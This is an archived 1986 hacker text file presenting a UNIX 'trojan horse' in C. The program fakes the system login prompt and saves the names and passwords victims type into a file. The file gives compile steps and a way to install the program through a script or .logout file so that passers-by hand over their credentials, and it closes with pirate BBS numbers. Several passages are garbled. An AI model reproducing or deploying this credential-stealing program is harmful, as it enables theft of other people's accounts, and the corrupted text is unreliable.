|
Revised trojan horse (Shooting Shark)
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
-------------------
A UNIX Trojan Horse
-------------------
Written By Shooting Shark on 10 June 1986. Released by Tiburon Systems
and R0DENTZWARE.
Disclaimer : I have *never* used the program below in any capacity except for testing it to see thatindeed work perfectly. I do not condone the use of such a program. I am presenting it for nomto upses only. I will not be held liable
for any damages caused by the use of this program.
The following is a "trojan horse" program written in C for unix versions 4.2 and 4.3 (berkely unix) C-shell. It might work on other versions of unix, such as AT&T System V. I haven't tried t Ti rga simulates the login for a unix machi
ne. When some poor fool enters his name and password, they will be written to a file called "stuff"home directory in the form:
user root has password joshua
if this file already exists, new password/login hacks will be appended to the file...thus after you rogram several times you will have a nice little database of hacked passwords.
How To Use The Program
----------------------
First, you'll need to configure the source so that it will look like your system's login when it is below). Then, put the source in a file called horse.c and type the following:
cc horse.c -lcurses -ltermcap
mv a.out horse
and your ready-to-run program will be called 'horse'. You will have to invoke horse from a shellscrate a new file and put these two lines in it:
horse
login
Now when you 'source' this file, the horse program will be invooked and you can leave your terminal as somebody walks up to it and unknowingly gives you their password.
If you like, you can append the above two lines to your ".logout" file,
and whenever you log out, the horse program will be run automatically.
------- source begins here --------
/* horse.c - Trojan Horse program. For entertainment purposes only.
* Written by Shooting Shark.
*/
#include <curses.h>
main()
{
char name[10], password[10];
int i;
FILE *fp, *fopen();
initscr();
printf("\n\nPyramid Technology 4.2/5.0 UNIX (tiburon)\n\n\n\nlogin: ");
/* You will need to alter the above line so it prints your system's
header. Each '\n' is a carriage return. */
scanf("%[^\n]",name);
getchar();
noecho();
printf("Password:");
scanf("%[^\n]",password);
printf("\n");
getchar();
echo();
sleep(5);
/* change the 'sleep(x)' above to give a delay similar to the delay your system gives. An instant "Lrrect" looks suspicious. */
if ( ( fp = fopen("stuff","a") ) != -1 ) {
fprintf(fp,"login %s has password %s\n",name,password);
fclose(fp);
}
printf("Login incorrect\n");
endwin();
}
--------- Source ends here. ---------
Note : in this program's present form, if somebody hits a ^C while your program is running, they wiled into your shell and you might be kicked out of your school or whatever. If you know C, yucnadasgal structure to trap ^C's.
Call:
IDI..........415/344-6568
30 megs, IBM pirate line, Forum-PC software.
The Matrix...415/922-2008
101 megs (no shit), IBM wares, Forum-PC software.
-----
|
|
